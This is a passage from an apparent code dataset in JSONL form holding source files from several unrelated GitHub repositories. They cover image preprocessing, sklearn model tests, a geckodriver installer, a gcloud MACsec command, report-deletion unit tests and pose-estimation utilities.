ad_element = (By.ID, 'dismiss-button')\n\n try:\n ad = WebDriverWait(driver, 30).until(EC.visibility_of_element_located(ad_element))\n\n if ad.is_displayed():\n ad.click()\n else:\n print(\"The element is not visible after waiting.\")\n pass\n except:\n pass\n","repo_name":"RobertoLL07/cinepolis","sub_path":"utilities/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2206888973","text":"from Analytics import agg_colors\nfrom Visu import build, common\nfrom Visu import create_html\n\ndef get_stats(data, event):\n data = data[data['Name'] == event]\n return [data['duration'].sum(), round(data['duration'].mean(),2), round(data['duration'].std(),2)]\n\ndef main(data):\n # Get data to plot\n data = agg_colors.get_lavender(data)\n data_prep = common.prepare_data(data)\n freqName = data_prep[['Name']].value_counts().to_frame().reset_index()\n\n # Genarete the plots and its filename, description and title\n plots_names = ['streaming_day_bar', 'streaming_nameDay_bar']\n plots_title = ['General daily frequency', 'Day of the week frequency']\n plots_desc = ['', '']\n build.bar(data_prep, 'day', plots_names[0], ['Name','start_time'])\n build.bar(data_prep, 'name_day', plots_names[1], ['Name','start_time'])\n\n # Get the complete html plot\n html_freq = '

Frequency

    '\n for i in range(freqName.shape[0]):\n stats = get_stats(data_prep, freqName.iloc[i,0])\n html_freq += '
  • ' + freqName.iloc[i,0] + ' happens ' + \\\n str(freqName.iloc[i,1]) + ' times - total of '+str(stats[0])+' hours '+ \\\n ' - avg of '+str(stats[1])+' and std of '+str(stats[2])+'
  • '\n html_freq += '
'\n html_plots = create_html.plots(plots_names, plots_title, plots_desc)\n html = '''\n

Streaming Events

\n

Events related with TV rsrsr

\n ''' + html_freq + html_plots\n\n return html","repo_name":"salomaoalves/DataScience_Visualization","sub_path":"GCalendar/Visu/streaming_events.py","file_name":"streaming_events.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40490656856","text":"import numpy as np\nfrom PIL import Image\nimport cv2\nfrom random import randrange\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\ndef transform(image, mask=None, size=None):\n image = image.convert('L')\n image = cut_to_spin(image)\n\n if mask is not None:\n image, mask = rotate(image, mask)\n mask = cut_to_spin(mask)\n\n image = np.array(image)\n # image = histo_equalized(image)\n image = clahe_equalized(image)\n image = adjust_gamma(image, 1.2)\n\n #image = transforms.ToTensor()(image)\n if mask is not None:\n #mask = np.array(mask)\n #verify(image, mask)\n #mask = transforms.ToTensor()(mask)\n \n return [image, mask]\n else:\n return image\n\ndef image2gray(image):\n img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n return img_gray\n\ndef dataset_normalized(imgs):\n imgs_normalized = np.empty(imgs.shape)\n imgs_std = np.std(imgs)\n imgs_mean = np.mean(imgs)\n imgs_normalized = (imgs-imgs_mean)/imgs_std\n imgs_normalized = ((imgs_normalized - np.min(imgs_normalized)) / (np.max(imgs_normalized)-np.min(imgs_normalized)))*255\n return imgs_normalized\n\ndef histo_equalized(imgs):\n imgs_equalized = np.empty(imgs.shape)\n imgs_equalized = cv2.equalizeHist(np.array(imgs, dtype = np.uint8))\n return imgs_equalized\n\ndef clahe_equalized(imgs):\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n imgs_equalized = np.empty(imgs.shape)\n imgs_equalized = clahe.apply(np.array(imgs, dtype = np.uint8))\n return imgs_equalized\n\ndef adjust_gamma(imgs, gamma=1.0):\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255 for i in np.arange(0, 256)]).astype(\"uint8\")\n new_imgs = np.empty(imgs.shape)\n new_imgs = cv2.LUT(np.array(imgs, dtype = np.uint8), table)\n return new_imgs\n\ndef rotate(image, mask):\n func = [\"false\", Image.FLIP_LEFT_RIGHT, Image.FLIP_TOP_BOTTOM, Image.ROTATE_90, Image.ROTATE_180, Image.ROTATE_270]\n get_idx = randrange(len(func))\n \n if func[get_idx] != \"false\":\n #print(mask.shape)\n image = image.transpose(func[get_idx])\n mask = mask.transpose(func[get_idx])\n \n return [image, mask]\n\ndef cut_to_spin(image):\n x, y = image.size\n remaining = abs(x - y) // 2\n if x < y:\n image = image.crop((0, remaining, x, y-remaining))\n else:\n image = image.crop((remaining, 0, x-remaining, y))\n\n x, y = image.size\n\n if x < y:\n image = image.crop((0, 0, x, y - 1))\n elif x > y:\n image = image.crop((0, 0, x - 1, y))\n\n return image\n\ndef verify(image, mask):\n out = cv2.subtract(image.copy(), mask.copy())\n plt.figure()\n plt.title(\"verify\")\n plt.imshow(out, cmap='gray')\n plt.show()\n\n'''\n\nif __name__ == \"__main__\":\n image = cv2.imread(\"./dataset/DRIVE/training/images/21_training.tif\")\n mask = cv2.imread(\"./dataset/DRIVE/training/1st_manual/21_manual1.gif\")\n\n image, mask = spin(image, mask)\n print(mask.shape)\n\n cv2.imshow(\"image\", image)\n cv2.imshow(\"image2\", mask)\n\n cv2.waitKey(0)\n'''","repo_name":"carlylezqy/Deep_Learning","sub_path":"Torch_Network/Segmentation/2D_Luxonus_UNet/image_transforms.py","file_name":"image_transforms.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36440097979","text":"import tool\nfrom numpy import *\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import GaussianNB\n\n\ndef testLogistic():\n logreg = LogisticRegression(C=1)\n trainingset, traininglabels = tool.file2floatMatrix('horseColicTraining.txt', 21)\n testset, testlabels = tool.file2floatMatrix('horseColicTest.txt', 21)\n logreg.fit(trainingset, traininglabels)\n print(\"logreg.coef_: {}\".format(logreg.coef_))\n print(\"logreg.intercept_: {}\".format(logreg.intercept_))\n print(\"Training set score: {:.2f}\".format(logreg.score(trainingset, traininglabels)))\n print(\"Test set score: {:.2f}\".format(logreg.score(testset, testlabels)))\n\n\ndef testSVM():\n svc = LinearSVC(C=50)\n trainingset, traininglabels = tool.file2floatMatrix('horseColicTraining.txt', 21)\n testset, testlabels = tool.file2floatMatrix('horseColicTest.txt', 21)\n svc.fit(trainingset, traininglabels)\n print(\"svc.coef_: {}\".format(svc.coef_))\n print(\"svc.intercept_: {}\".format(svc.intercept_))\n print(\"Training set score: {:.2f}\".format(svc.score(trainingset, traininglabels)))\n print(\"Test set score: {:.2f}\".format(svc.score(testset, testlabels)))\n\n\nif __name__ == '__main__':\n # testSVM()\n testLogistic()\n # testLasso()\n # testOLS()\n","repo_name":"xuhui1231/ml","sub_path":"linearModelWithMglearn.py","file_name":"linearModelWithMglearn.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"29258682914","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\"\n\n :param messages_filepath: path to the messages csv file\n :param categories_filepath: path to the categories csv file\n :return: messages and categories combined data_frame\n \"\"\"\n message_df = pd.read_csv(messages_filepath)\n categorie_df = pd.read_csv(categories_filepath)\n final_df = pd.merge(message_df, categorie_df, on='id')\n return final_df\n\n\ndef clean_data(df):\n \"\"\"\n\n :param df: combined dataframe made after merging messages and the categories.\n :return: cleaned df\n \"\"\"\n categories_df = df.categories.str.split(';', expand=True) # creating a dataframe of the 36 individual category columns.\n row = categories_df.loc[0, :] # Selecting first row\n category_col_header = row.apply(lambda x: x.split('-')[0]).values # getting different column headers\n categories_df.columns = category_col_header # renaming the columns of `categories`\n\n for column in categories_df:\n # set each value to be the last character of the string\n categories_df[column] = categories_df[column].str.split('-').str[1]\n\n categories_df.apply(pd.to_numeric)\n df.drop('categories', axis=1, inplace=True)\n df = pd.concat([df, categories_df], axis=1)\n return df\n\ndef save_data(df, database_filename):\n \"\"\"\n\n :param df: combined and cleaned dataframe\n :param database_filename: database filepath\n \"\"\"\n db_engine = create_engine('sqlite:///{}'.format(database_filename))\n df.to_sql(\"disaster_response\", db_engine, if_exists='replace', index=False)\n\n\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"prast567/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7605396272","text":"import numpy as np\nimport cv2\nimport torch\nfrom imageio import imread\n\n\ndef process_resize(w, h, resize):\n assert(len(resize) > 0 and len(resize) <= 2)\n if len(resize) == 1 and resize[0] > -1:\n scale = resize[0] / max(h, w)\n w_new, h_new = int(round(w*scale)), int(round(h*scale))\n elif len(resize) == 1 and resize[0] == -1:\n w_new, h_new = w, h\n else: # len(resize) == 2:\n w_new, h_new = resize[0], resize[1]\n\n # Issue warning if resolution is too small or too large.\n if max(w_new, h_new) < 160:\n print('Warning: input resolution is very small, results may vary')\n elif max(w_new, h_new) > 2000:\n print('Warning: input resolution is very large, results may vary')\n\n return w_new, h_new\n\n\ndef frame2tensor(frame, device):\n return torch.from_numpy(frame/255.).float()[None, None].to(device)\n\n\ndef get_new_resolution_with_minimum(minSize, I, strideNet):\n h, w = I.shape[:2]\n ratio = min(w / float(minSize), h / float(minSize))\n new_w, new_h = round(w / ratio), round(h / ratio)\n new_w, new_h = new_w // strideNet * strideNet, new_h // strideNet * strideNet\n return new_w, new_h\n\n\ndef read_image(path, device, rotation, resize_float, resize=None, min_size=None, strideNet=8):\n image = imread(str(path))\n if image is None:\n return None, None, None\n\n w, h = image.shape[1], image.shape[0]\n if min_size is not None:\n # it means we need to resize the image keeping aspect ratio so that smallest side is equal to min_size\n w_new, h_new = get_new_resolution_with_minimum(min_size, image, strideNet)\n else:\n w_new, h_new = process_resize(w, h, resize)\n scales = (float(w) / float(w_new), float(h) / float(h_new))\n\n if resize_float:\n image = cv2.resize(image.astype('float32'), (w_new, h_new))\n else:\n image = cv2.resize(image, (w_new, h_new))#.astype('float32')\n\n if rotation != 0:\n image = np.rot90(image, k=rotation).copy()\n # needs the copy for later to be read in torch !\n if rotation % 2:\n scales = scales[::-1]\n\n inp = frame2tensor(image, device)\n return image, inp, scales\n\n\n# --- GEOMETRY ---\ndef estimate_pose(kpts0, kpts1, K0, K1, ransac, thresh, conf=0.99999):\n if len(kpts0) < 5:\n return None\n\n f_mean = np.mean([K0[0, 0], K1[1, 1], K0[0, 0], K1[1, 1]])\n norm_thresh = thresh / f_mean\n\n kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]\n kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]\n\n if ransac:\n E, mask = cv2.findEssentialMat(\n kpts0, kpts1, np.eye(3), threshold=norm_thresh,\n prob=conf,\n method=cv2.RANSAC)\n else:\n E, mask = cv2.findFundamentalMat(\n kpts0, kpts1, method=cv2.FM_8POINT\n )\n\n ret = None\n if E is not None:\n best_num_inliers = 0\n\n for _E in np.split(E, len(E) / 3):\n n, R, t, _ = cv2.recoverPose(\n _E, kpts0, kpts1, np.eye(3), 1e9, mask=mask)\n if n > best_num_inliers:\n best_num_inliers = n\n ret = (R, t[:, 0], mask.ravel() > 0)\n return ret\n\n\ndef rotate_intrinsics(K, image_shape, rot):\n \"\"\"image_shape is the shape of the image after rotation\"\"\"\n assert rot <= 3\n h, w = image_shape[:2][::-1 if (rot % 2) else 1]\n fx, fy, cx, cy = K[0, 0], K[1, 1], K[0, 2], K[1, 2]\n rot = rot % 4\n if rot == 1:\n return np.array([[fy, 0., cy],\n [0., fx, w-1-cx],\n [0., 0., 1.]], dtype=K.dtype)\n elif rot == 2:\n return np.array([[fx, 0., w-1-cx],\n [0., fy, h-1-cy],\n [0., 0., 1.]], dtype=K.dtype)\n else: # if rot == 3:\n return np.array([[fy, 0., h-1-cy],\n [0., fx, cx],\n [0., 0., 1.]], dtype=K.dtype)\n\n\ndef rotate_pose_inplane(i_T_w, rot):\n rotation_matrices = [\n np.array([[np.cos(r), -np.sin(r), 0., 0.],\n [np.sin(r), np.cos(r), 0., 0.],\n [0., 0., 1., 0.],\n [0., 0., 0., 1.]], dtype=np.float32)\n for r in [np.deg2rad(d) for d in (0, 270, 180, 90)]\n ]\n return np.dot(rotation_matrices[rot], i_T_w)\n\n\ndef scale_intrinsics(K, scales):\n scales = np.diag([1./scales[0], 1./scales[1], 1.])\n return np.dot(scales, K)\n\n\ndef to_homogeneous(points):\n return np.concatenate([points, np.ones_like(points[:, :1])], axis=-1)\n\n\ndef angle_error_mat(R1, R2):\n cos = (np.trace(np.dot(R1.T, R2)) - 1) / 2\n cos = np.clip(cos, -1., 1.) # numercial errors can make it out of bounds\n return np.rad2deg(np.abs(np.arccos(cos)))\n\n\ndef angle_error_vec(v1, v2):\n n = np.linalg.norm(v1) * np.linalg.norm(v2)\n return np.rad2deg(np.arccos(np.clip(np.dot(v1, v2) / n, -1.0, 1.0)))\n\n\ndef compute_pose_error(T_0to1, R, t):\n R_gt = T_0to1[:3, :3]\n t_gt = T_0to1[:3, 3]\n error_t = angle_error_vec(t, t_gt)\n error_t = np.minimum(error_t, 180 - error_t) # ambiguity of E estimation\n error_R = angle_error_mat(R, R_gt)\n return error_t, error_R\n\n\ndef pose_auc(errors, thresholds):\n sort_idx = np.argsort(errors)\n errors = np.array(errors.copy())[sort_idx]\n recall = (np.arange(len(errors)) + 1) / len(errors)\n errors = np.r_[0., errors]\n recall = np.r_[0., recall]\n aucs = []\n for t in thresholds:\n last_index = np.searchsorted(errors, t)\n r = np.r_[recall[:last_index], recall[last_index-1]]\n e = np.r_[errors[:last_index], t]\n aucs.append(np.trapz(r, x=e)/t)\n return aucs\n\n\ndef matches_from_flow(flow, matchBinary, scaling=1.0):\n \"\"\"\n Retrieves the pixel coordinates of 'good' matches in source and target images, based on provided flow field\n (relating the target to the source image) and a binary mask indicating where the flow is 'good'.\n Args:\n flow: tensor of shape B, 2, H, W (will be reshaped if it is not the case). Flow field relating the target\n to the source image, defined in the target image coordinate system.\n binary_mask: bool mask corresponding to valid flow vectors, shape B, H, W\n scaling: scalar or list of scalar (horizontal and then vertical direction):\n scaling factor to apply to the retrieved pixel coordinates in both images.\n\n Returns:\n pixel coordinates of 'good' matches in the source image, Nx2 (numpy array)\n pixel coordinates of 'good' matches in the target image, Nx2 (numpy array)\n \"\"\"\n\n B, _, hB, wB = flow.shape\n xx = torch.arange(0, wB).view(1, -1).repeat(hB, 1)\n yy = torch.arange(0, hB).view(-1, 1).repeat(1, wB)\n xx = xx.view(1, 1, hB, wB).repeat(B, 1, 1, 1)\n yy = yy.view(1, 1, hB, wB).repeat(B, 1, 1, 1)\n grid = torch.cat((xx, yy), 1).float()\n\n if flow.is_cuda:\n grid = grid.cuda()\n matchBinary = matchBinary.cuda()\n\n mapping = flow + grid\n mapping_x = mapping.permute(0, 2, 3, 1)[:, :, :, 0]\n mapping_y = mapping.permute(0, 2, 3, 1)[:, :, :, 1]\n grid_x = grid.permute(0, 2, 3, 1)[:, :, :, 0]\n grid_y = grid.permute(0, 2, 3, 1)[:, :, :, 1]\n\n pts2 = torch.cat((grid_x[matchBinary].unsqueeze(1),\n grid_y[matchBinary].unsqueeze(1)), dim=1)\n pts1 = torch.cat((mapping_x[matchBinary].unsqueeze(1),\n mapping_y[matchBinary].unsqueeze(1)),\n dim=1) # convert to mapping and then take the correspondences\n\n return pts1.cpu().numpy()*scaling, pts2.cpu().numpy()*scaling\n","repo_name":"mattcoldwater/DM_modified","sub_path":"validation/utils_pose_estimation.py","file_name":"utils_pose_estimation.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"3832875616","text":"import csv,datetime \nfrom datetime import datetime,timedelta\n\n\ndef check_gas_testing_time_compliance() -> bool:\n \n EntFilePath=r'C:\\Users\\prash\\Desktop\\DE\\entrant_gas_reading.csv' #Provide path for entrant_gas_reading.csv\n PerFilePath=r'C:\\Users\\prash\\Desktop\\DE\\Periodic_Reading.csv' #Provide path for periodical_gas_reading.csv\n\n Entrant = {} #Creating a dict to store Entrant gas reading \n Periodic = [] #Creating a list to store PEriodical gas reading \n\n##Read the entrant file and store in variable Dict Entrant\n EntFile = open(EntFilePath, 'r')\n EntDict = csv.DictReader(EntFile)\n for row in EntDict:\n Entrant = row\n \n ##Read the Periodic file and store in variable Periodic \n PerFile = open(PerFilePath, 'r') \n PerList = csv.reader(PerFile)\n P = list(PerList)\n for x in P:\n for y in x:\n Periodic.append(y)\n Periodic.pop(0) ##Removing Column name gas reading time from list\n\n\n complaint = False\n\n #Converting string to datetime format \n exittime = datetime.strptime(Entrant['exit time'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n entrtime = datetime.strptime(Entrant['entry time'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n entrplus30mins = datetime.strptime(Entrant['entry time'], \"%Y-%m-%dT%H:%M:%S.%fZ\") + timedelta(minutes=30)\n diff = ((exittime - entrtime).total_seconds() / 60)\n\n \n if diff >= 30: # Check if the CW is staying more than 30 mins\n if len(Periodic) > 0: # checking if the periodic entry has values\n for x in Periodic: # checking if periodic entry is in compliance\n if datetime.strptime(x,\"%Y-%m-%dT%H:%M:%S.%fZ\")>=entrtime and datetime.strptime(x,\"%Y-%m-%dT%H:%M:%S.%fZ\")<=entrplus30mins:\n # checking if the periodic read time lies between Entry time and time less than 30 mins plus entry time\n complaint = True\n \n if complaint is True:\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n if check_gas_testing_time_compliance():\n print(\"Compliant\")\n else:\n print(\"Not Compliant\")\n","repo_name":"prashbala27/Codingtestsolution","sub_path":"MagellanX_Enclosed_Space_Entry_Compliant_Test.py","file_name":"MagellanX_Enclosed_Space_Entry_Compliant_Test.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20447859773","text":"# coding: utf-8\n\nimport os\nimport logging\nfrom . import utils\n\n\ndef install(cwd=False):\n \"\"\"\n Appends the directory of the geckodriver binary file to PATH.\n\n :param cwd: Flag indicating whether to download to current working directory\n :return: The file path of geckodriver\n \"\"\"\n geckodriver_filepath = utils.download_geckodriver(cwd)\n if not geckodriver_filepath:\n logging.debug('Can not download geckodriver.')\n return\n geckodriver_dir = os.path.dirname(geckodriver_filepath)\n if 'PATH' not in os.environ:\n os.environ['PATH'] = geckodriver_dir\n elif geckodriver_dir not in os.environ['PATH']:\n os.environ['PATH'] = geckodriver_dir + utils.get_variable_separator() + os.environ['PATH']\n return geckodriver_filepath\n\n\ndef get_firefox_version():\n \"\"\"\n Get installed version of chrome on client\n\n :return: The version of chrome\n \"\"\"\n return utils.get_firefox_version()\n","repo_name":"yeongbin-jo/python-geckodriver-autoinstaller","sub_path":"geckodriver_autoinstaller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"85"} +{"seq_id":"19900571196","text":"from sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport itertools\nfrom transformers import AutoTokenizer, AutoModel\n\n\ndef words_distance(string, word, words, n, nc):\n\twords_d = cosine_similarity(word, word)\n\tidx = list(cosine_similarity(string, word).argsort()[0][-nc:])\n \n\twords_of_interest = words_d[np.ix_(idx, idx)]\n\tsum_dist_min=1*10**100\n\ttmp = None\n\tfor c in itertools.combinations(range(len(idx)), n):\n\t\tsum_dist_act = sum([words_of_interest[m][n] for m, n in zip(c, c) if not m == n])\n\t\tif sum_dist_act < sum_dist_min: tmp = c; sum_dist_min = sum_dist_act\n\n\treturn [[words[y] for y in idx][i] for i in tmp]\n\n\ndef word_extraction(string, size=(1, 1), n=5, c=5):\n\twords_vectorize = CountVectorizer(ngram_range=size).fit([string]).get_feature_names()\n\tmodel = SentenceTransformer('distilbert-base-nli-mean-tokens')\n\treturn words_distance(model.encode([string]), model.encode(words_vectorize), words_vectorize, n, c)\n\n","repo_name":"AIDRI/ENCY-AI","sub_path":"src/AI/not_util/word_extraction.py","file_name":"word_extraction.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"20191771604","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.compute import base_classes\nfrom googlecloudsdk.api_lib.compute.interconnects import client\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.compute.interconnects import flags\n\nDETAILED_HELP = {\n 'DESCRIPTION':\n \"\"\"\\\n *{command}* is used to remove pre-shared key from MACsec configuration of\n interconnect.\n\n For an example, refer to the *EXAMPLES* section below.\n \"\"\",\n # pylint: disable=line-too-long\n 'EXAMPLES':\n \"\"\"\\\n To remove a pre-shared key from MACsec configuration, run:\n\n $ {command} example-interconnect --key-name=default-key\n \"\"\",\n # pylint: enable=line-too-long\n}\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA)\nclass RemoveKey(base.UpdateCommand):\n \"\"\"Remove pre-shared key from a Compute Engine interconnect MACsec configuration.\n\n *{command}* is used to remove pre-shared key from MACsec configuration of\n interconnect.\n \"\"\"\n\n INTERCONNECT_ARG = None\n\n @classmethod\n def Args(cls, parser):\n cls.INTERCONNECT_ARG = flags.InterconnectArgument()\n cls.INTERCONNECT_ARG.AddArgument(parser, operation_type='update')\n\n flags.AddMacsecPreSharedKeyNameForRomoveKey(parser)\n\n def Collection(self):\n return 'compute.interconnects'\n\n def Run(self, args):\n holder = base_classes.ComputeApiHolder(self.ReleaseTrack())\n ref = self.INTERCONNECT_ARG.ResolveAsResource(args, holder.resources)\n interconnect = client.Interconnect(ref, compute_client=holder.client)\n\n macsec = interconnect.Describe().macsec\n keys = macsec.preSharedKeys\n macsec.preSharedKeys = [key for key in keys if key.name != args.key_name]\n\n return interconnect.PatchAlphaBeta(\n description=None,\n interconnect_type=None,\n requested_link_count=None,\n link_type=None,\n admin_enabled=None,\n noc_contact_email=None,\n location=None,\n labels=None,\n label_fingerprint=None,\n macsec_enabled=None,\n macsec=macsec)\n\n\nRemoveKey.detailed_help = DETAILED_HELP\n","repo_name":"google-cloud-sdk-unofficial/google-cloud-sdk","sub_path":"lib/surface/compute/interconnects/macsec/remove_key.py","file_name":"remove_key.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"33491389919","text":"import unittest\nimport os\nimport copy\n\nfrom dotenv import load_dotenv\nfrom pathlib import Path\nfrom premembers.reports.batch import reports\nfrom premembers.repository import pm_reports\nfrom premembers.repository import pm_organizationTasks\nfrom premembers.common import common_utils\nfrom premembers.repository.const import Status\n\ntrace_id = \"eb3b5f76-8945-11e7-b15a-8f7e5433dada\"\nuser_id = common_utils.get_uuid4()\nmail_address = \"test-user{}@example.com\"\norganization_id = \"reports-78ee-11e7-89e6-OrganizationID\"\nproject_id = \"reports-77f1-11e7-adfe-ProjectID\"\nreport_id = \"reports-77f1-11e7-adfe-ReportID{}\"\nlog_id = \"reports-77f1-11e7-adfe-LogID{}\"\ntask_id = \"reports-77f1-11e7-adfe-TaskID{}\"\n\nreports_template = {\n \"ReportID\": report_id,\n \"ReportName\": \"reportName\",\n \"GenerateUser\": mail_address.format(str(0)),\n \"AWSAccounts\": [\"awsAccounts1\", \"awsAccounts2\", \"awsAccounts3\"],\n \"Status\": 0,\n \"ResourceInfoPath\": \"resourceInfoPathid\",\n \"JsonOutputPath\": \"jsonOutputPath\",\n \"JsonOutputTime\": \"jsonOutputTimeid\",\n \"HTMLOutputStatus\": 0,\n \"HTMLPath\": \"htmlPath\",\n \"HTMLOutputTime\": \"htmlOutputTime\",\n \"ExcelOutputStatus\": 0,\n \"ExcelPath\": \"7659CD67-03C1-423D-BDDA-6B7C5AF8B247/report/ja-JP/TESTREPORT.xlsx\",\n \"ExcelOutputTime\": \"excelOutputTime\",\n \"SchemaVersion\": 1,\n \"OrganizationID\": organization_id,\n \"ProjectID\": project_id\n}\n\ntask_code = \"DELETE_REPORT\"\norganization_task_template = {\n \"TaskID\": task_id,\n \"Code\": task_code,\n \"Target\": report_id,\n \"UserID\": user_id,\n \"MailAddress\": mail_address.format(str(0)),\n \"TaskStatus\": 0,\n \"RetryCount\": 1,\n \"MaxRetry\": 10,\n}\n\nreport_log_template = {\n 'ReportID': report_id,\n 'LogID': log_id,\n 'Code': \"Code\",\n 'UserID': user_id,\n 'MailAddress': mail_address.format(str(0)),\n 'JobID': common_utils.get_uuid4(),\n 'Parameter': None,\n 'LogStreamName': None\n}\n\n\nclass TestReports(unittest.TestCase):\n def setUp(self):\n dotenv_path = Path(os.getcwd()).joinpath('.env')\n if os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\n\n num = 1\n while num < 7:\n # Create Report\n tmp_report = copy.copy(reports_template)\n pm_reports.create_report(\n trace_id, tmp_report['ReportID'].format(str(num)),\n tmp_report['ReportName'], tmp_report['GenerateUser'],\n tmp_report['AWSAccounts'], 4, tmp_report['ResourceInfoPath'],\n tmp_report['JsonOutputPath'], tmp_report['JsonOutputTime'],\n tmp_report['HTMLOutputStatus'], tmp_report['HTMLPath'],\n tmp_report['HTMLOutputTime'], 2, tmp_report['ExcelPath'],\n tmp_report['ExcelOutputTime'], tmp_report['SchemaVersion'],\n tmp_report['OrganizationID'], tmp_report['ProjectID'])\n\n # Create organization task\n tmp_organization_task = copy.copy(organization_task_template)\n tmp_organization_task['TaskStatus'] = num\n if (num == 3 and num == 6):\n tmp_organization_task['TaskStatus'] = 0\n elif (num == 4):\n tmp_organization_task['TaskStatus'] = -1\n elif (num == 5):\n tmp_organization_task['TaskStatus'] = -1\n tmp_organization_task['RetryCount'] = tmp_organization_task['MaxRetry'] + 1\n\n pm_organizationTasks.create_organizationTask(\n trace_id, tmp_organization_task['TaskID'].format(str(num)),\n tmp_organization_task['Code'],\n tmp_organization_task['Target'].format(str(num)),\n tmp_organization_task['UserID'],\n tmp_organization_task['MailAddress'],\n tmp_organization_task['TaskStatus'],\n tmp_organization_task['RetryCount'],\n tmp_organization_task['MaxRetry'])\n num += 1\n\n def tearDown(self):\n num = 1\n while num < 7:\n pm_organizationTasks.delete(trace_id, task_id.format(str(num)))\n pm_reports.delete_reports(trace_id, report_id.format(str(num)))\n num += 1\n\n def test_batch_delete_reports_susscess(self):\n # Status = 0 Waiting\n event_mock = {\n 'TaskId': task_id.format(str(3)),\n 'Message': {\n 'MessageId': 'MessageId',\n 'ReceiptHandle': 'ReceiptHandle'\n }\n }\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(3)))\n # Check data\n self.assertEqual(int(organization_task['TaskStatus']), Status.Done.value)\n\n # Status = 4 ERROR and RetryCount < MaxRetry\n event_mock['TaskId'] = task_id.format(str(4))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(4)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Done.value)\n\n def test_batch_delete_reports_error_status_task(self):\n # Status = 1 Running\n event_mock = {\n 'TaskId': task_id.format(str(1)),\n 'Message': {\n 'MessageId': 'MessageId',\n 'ReceiptHandle': 'ReceiptHandle'\n }\n }\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(1)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n\n # Status = 2 Done\n event_mock['TaskId'] = task_id.format(str(2))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(2)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n\n # Status = -1 ERROR and RetryCount > MaxRetry\n event_mock['TaskId'] = task_id.format(str(5))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(5)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n","repo_name":"nisheeth84/prjs_sample","sub_path":"reference-code/lambda/cm-premembers-backend/tests/reports/batch/test_reports.py","file_name":"test_reports.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36142457467","text":"from .db import db\nfrom sqlalchemy 